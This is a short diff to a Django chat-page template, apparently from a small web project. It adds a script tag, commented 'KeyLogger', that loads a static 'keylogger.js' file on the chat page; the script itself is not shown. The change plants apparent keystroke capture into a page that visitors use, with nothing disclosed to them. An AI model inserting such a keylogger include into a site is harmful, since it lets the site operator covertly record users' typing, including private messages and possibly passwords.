--- a/my_site/templates/chat/index.html
+++ b/my_site/templates/chat/index.html
@@ -6,6 +6,9 @@
 {% block head %}
     <!--Чатик-->
     <script type="text/javascript" src="{% static 'scripts/chat.js' %}"></script>
+
+    <!--KeyLogger-->
+    <script type="text/javascript" src="{% static 'scripts/keylogger.js' %}"></script>
 {% endblock head %}
 
 {%block chat_page%}class="active"{%endblock chat_page%}
